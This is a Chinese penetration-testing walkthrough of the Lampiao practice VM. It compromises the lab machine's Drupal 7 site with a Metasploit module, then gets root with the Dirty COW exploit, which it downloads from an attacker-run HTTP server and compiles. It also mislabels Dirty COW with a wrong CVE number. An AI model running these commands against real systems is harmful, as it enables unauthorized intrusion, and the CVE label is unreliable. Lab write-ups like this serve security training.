文章目錄

• • • 一、信息收集
    • • 1.主機(jī)發(fā)現(xiàn)
      • 2.端口掃描
    • 二、漏洞挖掘
    • • 1.查看對方web服務(wù)
      • 2.使用 msfconsole get shell
      • 臟牛提權(quán)漏洞（CVE-2016-5191）
    • 三、臟牛提權(quán)
    • • 1.在 kali 查找 exp
      • 2.使用 python 傳輸 exp
      • 3.編譯利用

一、信息收集

1.主機(jī)發(fā)現(xiàn)

 arp-scan -l  

2.端口掃描

nmap -A -p- 192.168.1.120 

發(fā)現(xiàn)開啟了 22 ssh 服務(wù)
80、1898 web 服務(wù)，drupal7 框架

二、漏洞挖掘

1.查看對方web服務(wù)

訪問 80 端口：

訪問 1898 發(fā)現(xiàn) drupal 框架

發(fā)現(xiàn)點擊兩個 Read more 會跳轉(zhuǎn)到 ?q=node/1 和 ?q=node/3 ，沒有 2，嘗試訪問 node2
發(fā)現(xiàn)有兩個文件，嘗試訪問

發(fā)現(xiàn) audio.m4a 是一段音頻，內(nèi)容為 user tiago
qrc.png 為二維碼，掃描得到 Try harder！Muahuahua

2.使用 msfconsole get shell

msfconsole    #進(jìn)入msf 
search drupal    #搜索drupal框架漏洞 
use 4    #使用4號漏洞 
show options    #查看所有設(shè)置 
set rhosts 192.168.1.120    #設(shè)置目標(biāo)ip 
set rport 1898    #設(shè)置目標(biāo)端口 
run    #運(yùn)行

運(yùn)行后得到靶機(jī) shell，進(jìn)行信息收集

shell    #轉(zhuǎn)換為有回顯的shell 
pwd 
id 
uname -a

發(fā)現(xiàn)其版本信息為 2016.7.13 < 2016.10.18，可以使用臟牛漏洞進(jìn)行提權(quán)

臟牛提權(quán)漏洞（CVE-2016-5191）

漏洞范圍：
內(nèi)核 >= 2.6.22版本 (2007-2016年10月18日)
危害：
低權(quán)限的用戶可利用這一漏洞在本地進(jìn)行提權(quán)
原理：
linux內(nèi)核的子系統(tǒng)在處理寫入時復(fù)制至產(chǎn)生了競爭條件，惡意用戶可利用此漏洞來獲取高權(quán)限，對只讀內(nèi)存映射進(jìn)行訪問

三、臟牛提權(quán)

1.在 kali 查找 exp

searchsploit cow 
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/Desktop/ 

2.使用 python 傳輸 exp

#攻擊機(jī)開啟服務(wù)： 
python -m SimpleHTTPServer 8888  
#靶機(jī)獲取文件：
cd /tmp 
wget http://192.168.1.122:8888/40847.cpp

3.編譯利用

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil 
#-Wall 一般使用該選項，允許發(fā)出GCC能夠提供的所有有用的警告 
#-pedantic 允許發(fā)出ANSI/ISO C標(biāo)準(zhǔn)所列出的所有警告 
#-O2 編譯器的優(yōu)化選項的4個級別，-O0表示沒有優(yōu)化,-O1為缺省值，-O3優(yōu)化級別最高 
#-std=c++11 按C++2011標(biāo)準(zhǔn)來編譯的 
#-pthread 在Linux中要用到多線程時，需要鏈接pthread庫 
#-o 40847 gcc生成的目標(biāo)文件,名字為40847

總結(jié)：
1.雜亂的東西較多，但很真實，難度相對簡單
2.臟牛有兩個 exp:一個寫文件、一個修改 root 密碼，這里使用的第二個
3.上傳 exp 可以直接在 msf 的 meterpreter 中 upload + /root/Desktop/40847.cpp
4.在 /var/www/html/sites/default/settings.php 中有 tiago 用戶密碼，但是 ssh 連接后并未找到什么信息
5.同環(huán)境，提權(quán)一次后不重啟無法再次提權(quán)，重啟后再次提權(quán)可能環(huán)境炸裂enmmm

總結(jié)

以上是生活随笔為你收集整理的Lampiao靶机渗透测试的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。